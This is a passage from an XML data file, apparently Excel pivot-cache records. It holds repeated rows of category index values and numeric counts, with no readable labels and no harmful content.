    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="32"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="66"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="21"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="23"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="70"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="65"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="29"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="36"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="50"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="1439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="135"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="17"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="16"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="111"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1449"/>
  </r>
  <r>
